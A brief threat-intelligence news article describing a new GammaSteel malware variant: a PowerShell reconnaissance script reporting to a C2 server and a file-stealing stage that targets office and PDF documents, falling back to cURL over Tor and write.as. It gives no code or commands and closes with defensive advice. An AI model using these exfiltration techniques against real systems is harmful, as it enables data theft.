A recent cyber attack utilizing a new variant of the GammaSteel malware has been uncovered by cybersecurity researchers. This new variant is a two-stage attack that involves the use of PowerShell scripts to collect sensitive information from compromised computers and exfiltrate specific files.
The first script identified in this attack is designed to act as a reconnaissance tool, gathering various data about the infected computer. This includes information such as system specifications, the name of any security software present on the system, available disk space, the directory tree of the Desktop folder, and a list of all currently running processes. Once this information is collected, it is then sent back to a command and control (C2) server operated by the attackers.
The second script discovered in this attack is a PowerShell version of the GammaSteel malware. This script is tasked with exfiltrating files with specific extensions from targeted directories on the compromised system. The extensions targeted by this script include .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt, and .pdf. By exfiltrating files with these extensions, the attackers may be able to obtain sensitive information stored on the infected computer.
What sets this new variant of GammaSteel apart is its use of PowerShell web requests to exfiltrate files. In the event that this method fails, the malware is programmed to utilize the cURL command line tool with a Tor proxy to send the stolen data out. Additionally, researchers have identified code within the malware that suggests the use of the web service ‘write.as’ as a potential fallback data exfiltration channel.
This sophisticated two-stage attack highlights the evolving tactics employed by cybercriminals to steal sensitive information from unsuspecting victims. By utilizing tools like PowerShell and cURL, attackers can bypass security measures and exfiltrate data covertly, posing a significant threat to individuals and organizations alike.
It is essential for individuals and businesses to remain vigilant against such threats by implementing robust cybersecurity measures, including regularly updating security software, conducting regular system scans, and practicing good security hygiene. By staying informed and proactive, users can better protect themselves against emerging threats like the new GammaSteel variant.